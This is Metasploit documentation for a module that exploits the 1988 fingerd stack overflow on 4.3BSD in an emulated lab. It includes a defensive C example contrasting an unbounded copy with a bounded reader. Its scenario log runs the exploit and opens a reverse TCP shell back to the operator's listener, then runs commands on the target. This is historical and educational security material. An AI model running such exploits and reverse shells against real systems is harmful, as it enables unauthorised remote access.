2020-02-06 15:01:58 -06:00

## Vulnerable Application
### Description

This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.

This vulnerability was exploited by the Morris worm on 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
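
The bug class this module targets, as an added example that is not part of the module or of 4.3BSD's `fingerd`: an unbounded copy of the request line into a fixed stack buffer, beside a bounded reader that rejects oversized or non-printable requests. The 512-byte buffer size and the function names are assumptions made for illustration.

```c
#include <string.h>
/* Assumed size of the classic fingerd request buffer; the module's 533-byte
 * request is longer than this, which is the whole bug. */
#define FINGER_LINE_MAX 512

/* Vulnerable pattern: copies the request up to the line end with no bound,
 * so an oversized request runs off the end of the stack buffer. A model of
 * the bug class, not the original fingerd source; never called here. */
void read_request_unbounded(char *dst, const char *req)
{
    while (*req != '\0' && *req != '\r' && *req != '\n')
        *dst++ = *req++;
    *dst = '\0';
}

/* Hardened reader: knows the size of dst, stops at CR or LF (finger lines
 * end in CRLF), refuses a request that would not fit rather than silently
 * truncating it, and refuses bytes outside printable ASCII, which no finger
 * query needs. Returns the request length, or -1 if it was rejected. */
int read_request_bounded(char *dst, size_t size, const char *req)
{
    size_t n;
    if (size == 0)
        return -1;
    for (n = 0; req[n] != '\0' && req[n] != '\r' && req[n] != '\n'; n++) {
        unsigned char c = (unsigned char)req[n];
        if (n + 1 >= size || c < 0x20 || c > 0x7e) {
            dst[0] = '\0';            /* leave nothing partial behind */
            return -1;
        }
        dst[n] = (char)c;
    }
    dst[n] = '\0';
    return (int)n;
}

/* Constructed inputs: an ordinary query and a 533-byte one like the module's. */
int demo_normal(void)
{
    char line[FINGER_LINE_MAX];
    return read_request_bounded(line, sizeof line, "wvu\r\n");
}

int demo_oversized(void)
{
    char line[FINGER_LINE_MAX], req[600];
    memset(req, 'A', 533);
    memcpy(req + 533, "\r\n", 3);     /* copies the terminating NUL too */
    return read_request_bounded(line, sizeof line, req);
}
```

Rejecting rather than truncating matters here: a silently truncated request still reaches the user lookup, while a rejected one can be logged as the abnormal input it is.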
### Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.

For manual setup, please follow the Computer History Wiki's
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

### Targets

```
  Id  Name
  --  ----
  0   @(#)fingerd.c 5.1 (Berkeley) 6/6/85
```
## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).
## Options

**RPORT**

Set this to the target port. The default is 79 for `fingerd`, but the
port may be forwarded when NAT (SLiRP) is used in SIMH.

**PAYLOAD**

Set this to a BSD VAX payload. Currently, only
`bsd/vax/shell_reverse_tcp` is supported.
## Scenarios

### `fingerd` 5.1 on 4.3BSD

```
msf5 > use exploit/bsd/finger/morris_fingerd_bof
msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing

Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600

who am i
nobody tty?? Feb 6 13:45
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986

Would you like to play a game?
```